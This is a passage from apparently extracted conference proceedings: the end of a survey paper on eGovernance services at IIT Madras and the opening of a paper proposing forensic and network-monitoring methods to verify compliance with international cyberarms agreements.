The Act def<strong>in</strong>es terms such as e-form, e-Gazette, e-record, digital signature, digital signature certificate,<br />
key pair which play pivotal roles <strong>in</strong> different areas of eGovernment and e-commerce. !!<br />
Scope of eGovernance study<br />
While eGovernment encompasses a wide range of activities, this study concentrates on<br />
1. How effective are the onl<strong>in</strong>e facilities like course <strong>in</strong>formation, forms download<strong>in</strong>g, <strong>in</strong>stitute Circulars<br />
and Announcements, Mess registration system, fees payment, Blood bank.<br />
To f<strong>in</strong>d the responses about the advantages like 24x7 access. Time sav<strong>in</strong>g, transparency, user<br />
participation <strong>in</strong> decision mak<strong>in</strong>g and avoid<strong>in</strong>g paper work.<br />
2. Introduc<strong>in</strong>g other areas <strong>in</strong> eGovernance system like Medical history of patients <strong>in</strong> IITM hospital,<br />
issue of passes for film club members, hous<strong>in</strong>g allocation, travel approval.<br />
Objective<br />
To determ<strong>in</strong>e the extent to which usage of the EGovernance system at IIT Madras is effective and to f<strong>in</strong>d<br />
the performance and user satisfaction and to explore further avenues for eGovernance.<br />
214
Methodology<br />
Kasi Raju<br />
Survey method is used by provid<strong>in</strong>g questionnaires to the faculty, scholars, students and staff. Sample<br />
size of this study is 75. Convenient sample method is used. Data is encoded from the questionnaires for<br />
statistical analysis. Statistical tools like Chi-Square Test and Frequency analysis were used by apply<strong>in</strong>g<br />
SPSS (Statistical Package for Social Sciences – version 15).<br />
Analysis<br />
Table 1: Frequency analysis of onl<strong>in</strong>e facilities used <strong>in</strong> IITM<br />
No. of<br />
Not Used /<br />
Facilities Used<br />
respondents Percentage Not Responded Percentage<br />
Onl<strong>in</strong>e facilities 75 100 0 0<br />
Course Information 67 89 8 11<br />
Forms Download<strong>in</strong>g 58 77 23 23<br />
Project Status 21 28 54 72<br />
Onl<strong>in</strong>e Course<br />
Development 21 28 54 72<br />
Onl<strong>in</strong>e Course Regn 41 55 34 45<br />
Books Reservation 32 43 43 57<br />
Books Issue 35 47 40 53<br />
JEE/GATE-Centre 21 28 54 72<br />
Estate Compla<strong>in</strong>ts 12 16 63 84<br />
IITM Web Deve 21 28 54 72<br />
Inst.Circ. & Anns. 50 67 25 33<br />
Mess Registration 37 49 38 51<br />
Blood Bank 6 8 69 92<br />
Fees Payment 14 19 61 81<br />
Faculty/Stud. Detail 61 81 14 19<br />
Onl<strong>in</strong>e Appln. Sub. 20 27 55 73<br />
IITM Mast. Plan survey 10 13 64 85<br />
ICSR Perf. Survey 8 11 67 89<br />
Acad. Perf.Survey 5 7 70 93<br />
CC Perf. Survey 6 8 69 92<br />
Rate Contract 21 28 54 72<br />
Salary Information 23 31 52 69<br />
Us<strong>in</strong>g frequency analysis, the number of respondents who have used onl<strong>in</strong>e facilities <strong>in</strong> IITM was<br />
calculated. It was found that one hundred percent of respondents have used onl<strong>in</strong>e facilities.<br />
The respondents for view<strong>in</strong>g faculty/staff/student details is the highest and next comes those who are on<br />
forms download<strong>in</strong>g and next are those view<strong>in</strong>g <strong>in</strong>stitute circulars and announcements. The number of<br />
respondents who access blood bank facilities and Computer Centre performance are equal.<br />
The graph Figure 3 shows the respondents, who <strong>in</strong>clude faculty, staff, student and scholars, for<br />
<strong>in</strong>novative features of onl<strong>in</strong>e facilities at IITM. The most <strong>in</strong>novative feature is the Mess Registration and<br />
the next one is onl<strong>in</strong>e courses.<br />
215
Figure 2: Usage of onl<strong>in</strong>e facilities at IITM<br />
Kasi Raju<br />
Figure 3: Innovative features of onl<strong>in</strong>e facilities at IITM<br />
The follow<strong>in</strong>g table and the figure depicts that time sav<strong>in</strong>g is considered as the most important advantage<br />
among all.<br />
Table 2: Advantages of eGovernance as quoted by respondents<br />
Advantages Number of Respondents (yes)<br />
24*7 Access 61<br />
Time Sav<strong>in</strong>g 67<br />
Transparency 45<br />
User Participation <strong>in</strong> decision mak<strong>in</strong>g 33<br />
Avoid<strong>in</strong>g paper work 64<br />
216
Kasi Raju<br />
Figure 4: Advantages of eGovernance as quoted by respondents<br />
Hospital-Patient-History item is the most preferred one for the onl<strong>in</strong>e facility to be <strong>in</strong>troduced <strong>in</strong><br />
the future and the next items are film club and travel approval.<br />
Table 3: Suggestion for onl<strong>in</strong>e facilities to be <strong>in</strong>troduced <strong>in</strong> future<br />
Areas of onl<strong>in</strong>e facilities to be <strong>in</strong>troduced Number of Respondents(yes)<br />
Vot<strong>in</strong>g on <strong>Academic</strong>(BAR, BAC, DCC) 38<br />
Agenda(BAR, BAC, DCC) 27<br />
Gymkhana issues 34<br />
Film Club 47<br />
PCF Report 18<br />
Pension plan statement 23<br />
Travel Approval 45<br />
House Allocation 43<br />
Hospital patient history 64<br />
217
Kasi Raju<br />
Figure 5: Suggestion for onl<strong>in</strong>e facilities to be <strong>in</strong>troduced <strong>in</strong> future<br />
BAR: Board of <strong>Academic</strong> Research, BAC: Board of <strong>Academic</strong> Courses<br />
DCC:Department Consultative Committee, PCF: Personal Cont<strong>in</strong>gency Fund<br />
Table 4: Chi-Square test is significant and implies that the different k<strong>in</strong>ds of <strong>in</strong>novative features role wise<br />
<strong>in</strong>novation<br />
Innovation Faculty Staff Scholar Student Total<br />
Course Information 1 1 5 2 9<br />
Inst.Circulars & Announcements 2 1 2 0 5<br />
Mess Registration System 0 0 12 8 20<br />
Blood Bank 0 0 0 2 2<br />
Faculty & Student details 2 1 0 2 5<br />
Onl<strong>in</strong>e Application submission 0 2 0 1 3<br />
Computer Centre Performance 0 0 1 0 1<br />
Details of rate contract 0 5 0 0 5<br />
Salary <strong>in</strong>formation 0 2 0 0 2<br />
Project / Fund status 1 0 0 0 1<br />
Onl<strong>in</strong>e Course development 3 1 0 0 4<br />
Onl<strong>in</strong>e Course registration 0 0 0 4 4<br />
Books reservation & Journal reference 0 0 4 0 4<br />
Computerization of Catalogue(library) 0 1 3 3 7<br />
JEE/GATE-Centre representative 3 0 0 0 3<br />
Total 12 14 27 22 75<br />
218
Kasi Raju<br />
Among all <strong>in</strong>novative features, mess registration system was the most <strong>in</strong>novative. The second one is<br />
Course Information.<br />
7. The Summary of f<strong>in</strong>d<strong>in</strong>gs<br />
Hundred percent of the respondents have used the onl<strong>in</strong>e facilities.<br />
In the onl<strong>in</strong>e facilities category, onl<strong>in</strong>e course registration, view<strong>in</strong>g faculty, student and staff<br />
<strong>in</strong>formation, view<strong>in</strong>g Institute circulars and Announcements, Forms down load<strong>in</strong>g and view<strong>in</strong>g Salary<br />
<strong>in</strong>formation are preferred most by the respondents.<br />
In the most <strong>in</strong>novative category, Mess registration and onl<strong>in</strong>e course registration were opted as most<br />
<strong>in</strong>novative items.<br />
Time sav<strong>in</strong>g, Avoid<strong>in</strong>g paper work, 24x7 access and transparency were considered as the most<br />
advantages <strong>in</strong> the EGovernance system.<br />
Areas to be <strong>in</strong>troduced <strong>in</strong> future onl<strong>in</strong>e system.<br />
Hospital: Medical history of faculty, students and staff, Travel approval and statement, Film club issue of<br />
passes, vot<strong>in</strong>g on academic(BAR,BAC and DCC) and Gymkhana issue of passes were recommended by<br />
the respondents.<br />
8. Conclusion<br />
Apart from the above mentioned f<strong>in</strong>d<strong>in</strong>gs, many respondents expressed their concern for the security of<br />
the <strong>in</strong>formation both <strong>in</strong> transit through <strong>in</strong>ternet and as well as <strong>in</strong> the databases. It was felt by some<br />
respondents that the onl<strong>in</strong>e facilities are not user friendly. Our system implements secured eGovernance<br />
services us<strong>in</strong>g cryptographic protocols and primitives.<br />
Future work and Suggestions: Survey on effective utilization of “eGovernance Portals” us<strong>in</strong>g ICT<br />
(<strong>in</strong>formation and communication technology) <strong>in</strong>frastructure. I am plann<strong>in</strong>g to conduct a survey on how<br />
effectively the eGovernance <strong>in</strong>formation system is be<strong>in</strong>g used by the village people of Tamil Nadu. Due to<br />
the lack of computer facilities, people from villages could not access the web portal of the Tamil Nadu<br />
Government, <strong>in</strong> India. Therefore, I propose the new idea of collect<strong>in</strong>g the data from the NIC (National<br />
Informatics Centre) centre server's log file which conta<strong>in</strong>s district wise access of the people of Tamil<br />
Nadu. The process of collect<strong>in</strong>g <strong>in</strong>formation from this log file, draw<strong>in</strong>g relevant graphs and web-enabl<strong>in</strong>g<br />
can be automated by “cron” process available <strong>in</strong> the “Unix Operat<strong>in</strong>g System” web servers. Based on this<br />
<strong>in</strong>formation system, government can concentrate more <strong>in</strong> the villages of the districts which have not<br />
benefited from the eGovernance system. The follow<strong>in</strong>g figures depict the <strong>in</strong>novative ideas about the new<br />
method of data collection us<strong>in</strong>g ICTs. The two figures Figure 6a and 6b expla<strong>in</strong> the future tasks: the<br />
district wise data collection and the relevant graphs.<br />
Figure 6a: Future plan to collect data and web enabl<strong>in</strong>g<br />
219
Kasi Raju<br />
Figure 6b: Future plan to collect data and web enabl<strong>in</strong>g<br />
References<br />
http://portal.unesco.org/ci/en/ev.php-URL_ID=2179&URL_DO=DO_TOPIC&URL_SECTION=201.html<br />
http://en.wikipedia.org/wiki/Thirty-Six_Stratagems#Thirty-Six_Stratagems<br />
Carr, Jeffrey Pub: O’Reilly && Book: “Inside Cyber Warfare”<br />
Satyanarayana, J. pub: Prentice Hall of India. P;20 pub: Prentice Hall of India. P;20# book: “eGovernment: The<br />
Science of possible”<br />
www.umass.edu/digitalcenter/research/work<strong>in</strong>g_papers/05_001gilgarcia.pdf<br />
Vivekanandan, V. C Associate Professor, NALSAR Proximate University.!! Cyber Crimes, Author :<br />
220
Steps towards Monitor<strong>in</strong>g Cyberarms Compliance<br />
Neil Rowe 1 , Simson Garf<strong>in</strong>kel 1 , Robert Beverly 1 , and Panayotis Yannakogeorgos 2<br />
1 U.S. Naval Postgraduate School, Monterey, USA<br />
2 Air Force Research Institute, Maxwell AFB, USA<br />
ncrowe at nps dot edu<br />
slgarf<strong>in</strong> at nps dot edu<br />
rbeverly at nps dot edu<br />
yannakog1 at gmail dot com<br />
Abstract: Cyberweapons are difficult weapons to control and police. Nonetheless, technology is becom<strong>in</strong>g available<br />
that can help. We propose here the underly<strong>in</strong>g technology necessary to support cyberarms agreements.<br />
Cyberweapons usage can be dist<strong>in</strong>guished from other malicious Internet traffic <strong>in</strong> that they are aimed precisely at<br />
targets which we can often predict <strong>in</strong> advance and can monitor. Unlike cybercrim<strong>in</strong>als, cyberweapons use will have<br />
political goals, and thus attackers will likely not try hard to conceal themselves. Furthermore, cyberweapons are<br />
temperamental weapons that depend on flaws <strong>in</strong> software, and flaws can get fixed. This means that cyberweapons<br />
test<strong>in</strong>g will be seen before a serious attack. As well, we may be able to f<strong>in</strong>d evidence of cyberweapons on<br />
computers seized dur<strong>in</strong>g or after hostilities s<strong>in</strong>ce cyberweapons have important differences from other software and<br />
are difficult to conceal on their development platforms. Recent advances <strong>in</strong> quick methods for assess<strong>in</strong>g the<br />
contents of a disk drive can be used to rule out irrelevant data quickly. We also discuss methods for mak<strong>in</strong>g<br />
cyberweapons more responsible by attribution and reversibility, and we discuss the k<strong>in</strong>ds of <strong>in</strong>ternational agreements<br />
we need to control them.<br />
Keywords: cyberweapons, cyberattacks, agreements, monitor<strong>in</strong>g, forensics, reversibility<br />
1. Introduction<br />
Cyberweapons are software that can be used to achieve military objectives by disabl<strong>in</strong>g computer<br />
systems, networks, or key functions of them. They can be malicious software <strong>in</strong>stalled secretly through<br />
concealed downloads or deliberate plants by human agents, or they can be attempts to overload onl<strong>in</strong>e<br />
services. Cyberweapons are a grow<strong>in</strong>g component <strong>in</strong> military arsenals (Libicki 2007). Increas<strong>in</strong>gly<br />
countries are <strong>in</strong>stitut<strong>in</strong>g "cyberattack corps" with capabilities to launch attacks <strong>in</strong> cyberspace on other<br />
countries as an <strong>in</strong>strument of war, either alone or comb<strong>in</strong>ed with attacks by conventional military forces<br />
(Clarke and Knake 2010). Cyberattacks seem appeal<strong>in</strong>g to many military commanders <strong>in</strong> comparison to<br />
conventional arms. They seem to require fewer resources to mount s<strong>in</strong>ce their delivery can be<br />
accomplished <strong>in</strong> small payloads such as malicious devices or packets. They also seem "cleaner" than<br />
conventional weapons <strong>in</strong> that their damage is primarily to data and data can be repaired, although they<br />
are they are difficult to control and often perform actions close to perfidy, outlawed by the laws of war<br />
(Rowe 2010 JTE). Cyberweapons can be developed with modest technological <strong>in</strong>frastructure, even by<br />
underdeveloped countries (Gady 2010) tak<strong>in</strong>g advantages of <strong>in</strong>ternational resources. So there is a<br />
particular threat of cyberattacks from "rogue states" such as North Korea and terrorist groups that hold<br />
extreme po<strong>in</strong>ts of view.<br />
Many of the <strong>in</strong>formation-security tools we use to control threats and vulnerabilities with the common<br />
crim<strong>in</strong>al cyberattacks (Brenner 2010) will aid aga<strong>in</strong>st the cyberweapon threat. Good software<br />
eng<strong>in</strong>eer<strong>in</strong>g practices, access controls, and system and network monitor<strong>in</strong>g all help. But they are<br />
<strong>in</strong>sufficient to stop cyberattacks today because of the <strong>in</strong>creas<strong>in</strong>g numbers of cyberattacks and the<br />
<strong>in</strong>herent weaknesses of these countermeasures. State-sponsored cyberattacks will be even harder to<br />
stop because they can exploit significant resources and could be more sophisticated than the attacks<br />
common today. They will likely employ a variety of methods simultaneously to have a high probability of<br />
success, and they can be tested thoroughly under a range of circumstances. Most current defensive<br />
measures will probably be useless aga<strong>in</strong>st them.<br />
2. Approach<br />
What can be done aga<strong>in</strong>st such threats? We believe that countries must negotiate <strong>in</strong>ternational<br />
agreements similar to those for nuclear, chemical, and biological weapons. Such agreements (treaties,<br />
conventions, protocols, and memoranda of understand<strong>in</strong>g) (Croft 1996) can dictate the ways <strong>in</strong> which<br />
cyberweapons can be used, as for <strong>in</strong>stance stipulat<strong>in</strong>g that countries agree to use cyberweapons only <strong>in</strong><br />
defense to a cyberattack or <strong>in</strong> a serious crisis. Agreements can require action aga<strong>in</strong>st hacker groups<br />
with<strong>in</strong> a country as part of that country's <strong>in</strong>ternal polic<strong>in</strong>g so that a nation cannot shift blame for<br />
cyberattacks and cyberweapons onto them. Very little has been done <strong>in</strong> propos<strong>in</strong>g such agreements to<br />
221
Neil Rowe et al.<br />
date. It is time to plan out what such agreements will entail and how they should be enforced. The<br />
EastWest Institute <strong>in</strong> the U.S. recently proposed a cyberwar "Geneva Convention" (Rooney 2011).<br />
(Johnson 2002) was skeptical <strong>in</strong> 2002 of the ability to implement cyberarms control, cit<strong>in</strong>g the difficulty of<br />
monitor<strong>in</strong>g compliance. But the evolution of attacks s<strong>in</strong>ce 2002 underm<strong>in</strong>es many of his arguments.<br />
Cyberweapons are no longer a "cottage <strong>in</strong>dustry" but require significant <strong>in</strong>frastructure for f<strong>in</strong>d<strong>in</strong>g exploits,<br />
f<strong>in</strong>d<strong>in</strong>g targets, ga<strong>in</strong><strong>in</strong>g access, manag<strong>in</strong>g the attacks, and conceal<strong>in</strong>g the attacks, and this <strong>in</strong>frastructure<br />
leaves traces. This is because target software, systems, and networks are becom<strong>in</strong>g <strong>in</strong>creas<strong>in</strong>gly<br />
hardened and complex, and attack<strong>in</strong>g them is becom<strong>in</strong>g harder; and also because vulnerabilities are<br />
be<strong>in</strong>g found and fixed faster than ever. Also, digital forensics has advanced significantly s<strong>in</strong>ce 2002,<br />
mak<strong>in</strong>g it possible to determ<strong>in</strong>e all k<strong>in</strong>ds of th<strong>in</strong>gs from analysis of disk drives. Some technologies central<br />
for crim<strong>in</strong>al cyberattacks today like code obfuscation have little legitimate use and are good <strong>in</strong>dicators of<br />
cyberattack development, and we expect that the technologies used by cyberweapons will be similar.<br />
Thus we th<strong>in</strong>k <strong>in</strong>ternational agreements on cyberweapons are worth the effort even though f<strong>in</strong>d<strong>in</strong>g<br />
cyberweapons and observ<strong>in</strong>g their use is hard. The situation is similar to that with chemical weapons for<br />
which there are, for example, many methods for mak<strong>in</strong>g mustard gas that can use common chemicals<br />
with legitimate uses. Although prov<strong>in</strong>g that a facility is used for chemical or biological weapons<br />
production is difficult, the type of equipment at a facility can give a good probability that it has been used<br />
to manufacture such weapons, as U.N. <strong>in</strong>spectors realized <strong>in</strong> Iraq <strong>in</strong> the 1990s when they discovered<br />
evidence of airlocks <strong>in</strong> alleged food-production facilities. International conventions bann<strong>in</strong>g chemical and<br />
biological weapons hav<strong>in</strong>g been effective despite the difficulties of verify<strong>in</strong>g production and stockpil<strong>in</strong>g of<br />
such weapons (Price 1997). We th<strong>in</strong>k that similar exam<strong>in</strong>ations, and therefore conventions, should be<br />
possible <strong>in</strong> the cyberdoma<strong>in</strong>. Even if developers of cyberweapons delete or hide evidence on their disks,<br />
there are many ways to retrieve it (Garf<strong>in</strong>kel 2006). We should start research<strong>in</strong>g now how to perform<br />
effective cyber<strong>in</strong>spections.<br />
We realize that policy is too often driven by crises, so it may take a serious cyberattack to <strong>in</strong>terest a<br />
country <strong>in</strong> negotiat<strong>in</strong>g cyberarms limitations. Such a cyberattack is technically feasible (Clarke and<br />
Knake 2010) and could happen at any time. We need to be ready with proposals if it happens. In the<br />
meantime, progress can be made by the United Nations <strong>in</strong> negotiat<strong>in</strong>g broad cyberarms agreements.<br />
Such agreements could be helpful when rogue countries such as North Korea and terrorist organizations<br />
threaten the development of cyberwarfare capabilities and broad <strong>in</strong>ternational cooperation is possible.<br />
Two recent cases provide motivation. One is the cyberattacks on Georgia <strong>in</strong> August 2008 discussed <strong>in</strong><br />
(Rowe 2010 ECIW). These were denial-of-service attacks aga<strong>in</strong>st predom<strong>in</strong>antly Georgian government<br />
Web sites. They were effective but there was collateral damage from the imprecision of the attack.<br />
Evidence suggests that private <strong>in</strong>terests <strong>in</strong> Russia were responsible for the attacks (USCCU 2009). The<br />
other case is the "Stuxnet" worm and correspond<strong>in</strong>g exploits target<strong>in</strong>g SCADA systems (Markoff 2010).<br />
These used traditional malware methods for modify<strong>in</strong>g programs. S<strong>in</strong>ce Stuxnet targeted <strong>in</strong>dustrial<br />
systems with no associated f<strong>in</strong>ancial <strong>in</strong>centive, it was clearly developed by an <strong>in</strong>formation-warfare group<br />
of a nation-state. It appears that Stuxnet was discovered because it spread well beyond its <strong>in</strong>tended<br />
target. Nevertheless, <strong>in</strong> November 2010 it was reported that Stuxnet may have been successful <strong>in</strong><br />
destroy<strong>in</strong>g multiple uranium process<strong>in</strong>g centrifuges that are part of the Iranian nuclear effort.<br />
3. Details<br />
To achieve <strong>in</strong>ternational agreements on cyberweapons, we see four issues: (1) locat<strong>in</strong>g them on<br />
computers; (2) notic<strong>in</strong>g their use; (3) encourag<strong>in</strong>g the more responsible k<strong>in</strong>ds of cyberweapons; and (4)<br />
choos<strong>in</strong>g appropriate types of agreements.<br />
3.1 Analysis of drives to f<strong>in</strong>d cyberweapons<br />
The U.S. analyzed a number of captured computers and devices <strong>in</strong> its recent military operations <strong>in</strong> Iraq<br />
and Afghanistan. This was useful <strong>in</strong> identify<strong>in</strong>g <strong>in</strong>surgent networks and their <strong>in</strong>terconnections. Similarly,<br />
we believe that a good deal can be learned about a country's cyberweapons from the computers used to<br />
develop or deploy them. As part of a negotiated settlement of a conflict, a country may agree to forego<br />
cyberweapons, and may agree to submit to periodic <strong>in</strong>spections to confirm this (United Nations 1991).<br />
Detection of cyberweapons might seem difficult. But there are precedents <strong>in</strong> the detection of nuclear,<br />
chemical, and biological weapons (O'Neill 2010). Cyberweapons development generally requires<br />
222
Neil Rowe et al.<br />
unusual computer usage <strong>in</strong> secret facilities s<strong>in</strong>ce most cyberweapons require secrecy to be effective,<br />
which rules out most software development facilities. Clues to cyberweapons can also be found <strong>in</strong>side<br />
computers. Certa<strong>in</strong> types of software technology such as code obfuscation and spamm<strong>in</strong>g aids are good<br />
clues to malicious <strong>in</strong>tent. Code for known attacks (for provid<strong>in</strong>g reuse opportunities) and stolen<br />
proprietary code such as W<strong>in</strong>dows source code (for test<strong>in</strong>g attacks) are other good clues. Technologies<br />
such systematic code testers, "fuzz<strong>in</strong>g" utilities, and code for remote control of other computers provide<br />
support<strong>in</strong>g evidence of cyberweapons development though they have some legitimate uses. Data alone<br />
can be a clue, such as detailed reconnaissance <strong>in</strong>formation on adversary computer networks. Diversity<br />
of software techniques is a clue to cyberweapons development because the unreliability of cyberweapons<br />
requires use of multiple methods as backup. Once suspected cyberweapons are found, they can be<br />
studied systematically to confirm their nature us<strong>in</strong>g malware analysis (Mal<strong>in</strong>, Casey, and Aquil<strong>in</strong>a 2008).<br />
A cyberweapon <strong>in</strong>spection regime would have to be performed on-site and with automated tools, as a<br />
party to a cybermonitor<strong>in</strong>g regime would not allow a potential adversary to remove materials from a<br />
secret facility. Cyberweapon monitors would likely be required to use bootable CD-ROMs that would<br />
conta<strong>in</strong> programs to analyze the contents of a computer system and look for evidence of cyberweapon<br />
development. Inspection would require a scheme for management of the necessary passwords and keys<br />
for the systems <strong>in</strong>spected, which could be aided by key escrow methods. Inspection regimes should also<br />
require "write-blockers" to assure that the monitors did not themselves plant cyberweapons on the<br />
systems be<strong>in</strong>g monitored. Other useful ideas from monitor<strong>in</strong>g of nuclear capabilities (O'Neill 2010)<br />
<strong>in</strong>clude agreed <strong>in</strong>spector entry <strong>in</strong>to the <strong>in</strong>spected country with<strong>in</strong> a time limit, allowed bann<strong>in</strong>g of certa<strong>in</strong><br />
<strong>in</strong>spectors, designation of off-limits areas, and limits on what k<strong>in</strong>d of evidence can be collected.<br />
A good prototype of what can be done <strong>in</strong> analysis of drives is our work on the Real Data Corpus, our<br />
collection of drive images (mostly disks) collected from around the world. Currently this collection<br />
<strong>in</strong>cludes more than 2000 disk images. Recent work has characterized disks and drives as a whole,<br />
<strong>in</strong>clud<strong>in</strong>g understand<strong>in</strong>g of the type of user and the type of usages (Rowe and Garf<strong>in</strong>kel 2010). Clusters<br />
of files that have no counterpart <strong>in</strong> others <strong>in</strong> a corpus are particularly <strong>in</strong>terest<strong>in</strong>g, and can be the focus of<br />
more detailed forensic analysis. For faster assessment, random sampl<strong>in</strong>g of fragments taken from the<br />
middle of a file can accurately identify different types of data (Garf<strong>in</strong>kel et al. 2010). Tools for detect<strong>in</strong>g<br />
deception markers are also useful s<strong>in</strong>ce illegal cyberweapons development would need to be concealed.<br />
Deception could be <strong>in</strong> the form of deleted, renamed, or encrypted files, and could be enhanced by other<br />
techniques such as chang<strong>in</strong>g the system clock or manipulat<strong>in</strong>g a log file.<br />
3.2 Network monitor<strong>in</strong>g for cyberweapons<br />
There are many tools to discrim<strong>in</strong>ate legitimate from abusive network traffic. Such <strong>in</strong>ferential <strong>in</strong>trusion<br />
detection has limitations due to the difficulty of def<strong>in</strong><strong>in</strong>g malicious traffic <strong>in</strong> a sufficiently general way<br />
without <strong>in</strong>curr<strong>in</strong>g a large number of false positives (Trost, 2010). But the attack landscape is different for<br />
politically and economically motivated state-sponsored cyberattacks:<br />
Targets: State-sponsored attacks will be targeted to particular regions and political agendas, <strong>in</strong><br />
contrast to most crim<strong>in</strong>als, who target victims <strong>in</strong>discrim<strong>in</strong>ately.<br />
Sophistication: Cyberarms will be the product of well-funded nations with significant resources.<br />
Thus they will use new and sophisticated techniques rather than the common simplem<strong>in</strong>ded attacks<br />
we see on the Internet. That may mean their <strong>in</strong>itial stages may be hard to detect. However, as with<br />
all weapons, they must eventually produce a significant effect, and at that po<strong>in</strong>t their use will be<br />
obvious.<br />
Attribution: As with conventional warfare, the warr<strong>in</strong>g parties will likely follow specified (nondigital)<br />
protocols. Protocols will likely dictate that combatants reveal who they are at least <strong>in</strong> general terms.<br />
These features mean that there will be clues to cyberweapons use <strong>in</strong> the nature of the targets, the<br />
sophistication and effectiveness of the attack, and the ability to attribute them. We can use conventional<br />
network monitor<strong>in</strong>g to detect significant attacks; for <strong>in</strong>stance, the denial of service <strong>in</strong> the Georgia attacks<br />
was easy to recognize. This does require a sufficiently broad deployment of network-traffic vantage<br />
po<strong>in</strong>ts, secured both physically and virtually from tamper<strong>in</strong>g. One approach to deploy<strong>in</strong>g them is to have<br />
the vantage po<strong>in</strong>ts be entirely passive and communicate over separate <strong>in</strong>frastructure via encrypted and<br />
authenticated channels. Centralization is an issue <strong>in</strong> the monitor<strong>in</strong>g; the United Nations would probably<br />
want a centralized approach if they are to monitor. Ideally, a vantage po<strong>in</strong>t should exist at the <strong>in</strong>gress to<br />
each important network of a country, capable of full-rate traffic process<strong>in</strong>g. If this is difficult, random<br />
223
Neil Rowe et al.<br />
sampl<strong>in</strong>g of traffic can be done. The monitor<strong>in</strong>g <strong>in</strong>frastructure could be realized via government mandate<br />
or as part of efforts to enable wiretap compliance.<br />
Whereas the target<strong>in</strong>g of a crim<strong>in</strong>al attack is often widespread and <strong>in</strong>discrim<strong>in</strong>ate to obta<strong>in</strong> maximum<br />
victimization rates and profit to the crim<strong>in</strong>al (although there are exceptions for some sophisticated<br />
f<strong>in</strong>ancial scams), cyberweapons are likely to be much more focused. A cyberweapon might attack a<br />
particular country, a type of service (e.g. electrical grid or water systems), or systems used by a certa<strong>in</strong><br />
political, ethnic or religious persuasion. Both the Georgia and Stuxnet attacks employed moderately<br />
focused target<strong>in</strong>g (<strong>in</strong>sufficiently focused accord<strong>in</strong>g to critics). However, potential vulnerabilities and<br />
attack vectors will not correlate much with targets and there must be significant test<strong>in</strong>g. This complicates<br />
the job of the attacker and requires additional tools beyond those used <strong>in</strong> purely crim<strong>in</strong>al endeavors. We<br />
can use this difference to our advantage <strong>in</strong> detect<strong>in</strong>g cyberweapons development. Cyberweapons by<br />
their nature are complex pieces of software that <strong>in</strong>clude components for penetrat<strong>in</strong>g remote systems,<br />
controll<strong>in</strong>g the remote systems, and propagat<strong>in</strong>g to other systems. Understand<strong>in</strong>g the behavior of a<br />
cyberweapon <strong>in</strong> isolation, or <strong>in</strong> simulated environments is difficult – the more secret the test<strong>in</strong>g, the less<br />
like the real world it will be, and the less accurate it will be at predict<strong>in</strong>g real-world performance. We can<br />
see this demonstrated <strong>in</strong> the poor <strong>in</strong>itial performance of complex new conventional weapons systems<br />
such as aircraft. We expect that countries wish<strong>in</strong>g to employ cyberweapons will first unobtrusively try<br />
them aga<strong>in</strong>st real targets to understand their real-world efficacy. An example is the attacks on Estonia <strong>in</strong><br />
2007 prior to the attacks on Georgia <strong>in</strong> 2008. The breadth of the <strong>in</strong>itial test<strong>in</strong>g provides a clue to<br />
forthcom<strong>in</strong>g cyberweapons use.<br />
Thus, detect<strong>in</strong>g pre-hostility events at the network level is possible. It can be aided by metrics for<br />
detect<strong>in</strong>g national or political bias <strong>in</strong> the targets of malicious network traffic. Standard statistical<br />
techniques can suggest that the victims represent a particular political perspective or country's <strong>in</strong>terest<br />
more than a random sample would (Rowe and Goh 2007). For <strong>in</strong>stance, a significance test on a l<strong>in</strong>ear<br />
metric encod<strong>in</strong>g political or social agendas can provide a first approximation, while the Kullback-Leibler<br />
divergence can characterize the extent of difference between expected and observed traffic distributions.<br />
How do we identify the political or social agenda to search for? This requires help from experts on<br />
<strong>in</strong>ternational relations. Nations have longstand<strong>in</strong>g grievances with other nations, and particular issues<br />
are more sensitive <strong>in</strong> some nations than others. We can enumerate many of them and identify<br />
associated Internet sites.<br />
We expect other properties of the observable network traffic to provide precursors to attack. Feature<br />
selection methods <strong>in</strong> f<strong>in</strong>d<strong>in</strong>g discrim<strong>in</strong>at<strong>in</strong>g network traffic features (Beverly and Soll<strong>in</strong>s 2008) provide a<br />
start. Network-flow data may be sufficient for early warn<strong>in</strong>gs (Munz and Carle 2007). It will work well <strong>in</strong><br />
track<strong>in</strong>g and analyz<strong>in</strong>g attacks supported by hacker groups, such as the Ch<strong>in</strong>ese hacker groups<br />
(Hv<strong>in</strong>stendahl 2010) that are harnessed to attack Western organizations at times of political or social<br />
grievances aga<strong>in</strong>st them. We also can look for particular sequences of events <strong>in</strong>dicative of a systematic<br />
attack, say a broadcast of many footpr<strong>in</strong>t<strong>in</strong>g packets followed by more specific footpr<strong>in</strong>t<strong>in</strong>g, someth<strong>in</strong>g not<br />
seen much <strong>in</strong> crim<strong>in</strong>al cyberattacks.<br />
An additional tool useful <strong>in</strong> detect<strong>in</strong>g cyberweapons development is a decoy, a site deliberately designed<br />
to encourage attacks. A decoy can be designed to be more useful than a normal site by narrow<strong>in</strong>g its<br />
content to just that necessary to <strong>in</strong>voke a response. A decoy can also be equipped with more detailed<br />
monitor<strong>in</strong>g of its usage that would not be possible for most sites, and should use honeypot technology to<br />
implement attack resilience and <strong>in</strong>telligence-gather<strong>in</strong>g capabilities that are not easily disabled. Decoys<br />
do not generally raise ethical concerns because they are passive, but guidel<strong>in</strong>es should be followed <strong>in</strong><br />
their use (Rowe 2010 JTE) s<strong>in</strong>ce decoys are used by phishers.<br />
Data fusion on World Wide Web usage can complement our network monitor<strong>in</strong>g. If a country's<br />
government shows a sudden <strong>in</strong>crease <strong>in</strong> visits to hacker Web sites, it may suggest cyberweapons<br />
development.<br />
3.3 Encourag<strong>in</strong>g more-responsible cyberattacks<br />
International agreements can stipulate the manner <strong>in</strong> which cyberwarfare can be conducted. Two<br />
important aspects of this are attribution and reversibility of attacks. For attribution, a responsible country<br />
will f<strong>in</strong>d it <strong>in</strong> their <strong>in</strong>terests to make their attacks clear <strong>in</strong> orig<strong>in</strong> to better enable desired political and social<br />
effects of an attack, which are often more important than the actual military value. The ability to trace the<br />
Georgia cyberattacks back to Russia without too much trouble suggests such an political effect was<br />
224
Neil Rowe et al.<br />
<strong>in</strong>tended. Contrarily, it could be useful to a country to be able to prove it was not the source of a<br />
cyberattack for which it is be<strong>in</strong>g blamed. Attribution can be done by digital signatures attached to attack<br />
code or data that identify who is responsible for an attack and why. They could be concealed<br />
steganographically (Wayner 2002) to avoid provid<strong>in</strong>g a clue to the victim that they are be<strong>in</strong>g attacked.<br />
For attacks without code like denial of service, a signature can be encoded <strong>in</strong> the low-order bits of the<br />
times of the attacks.<br />
Nations should also be encouraged to use attack methods that are more easily repairable, follow<strong>in</strong>g the<br />
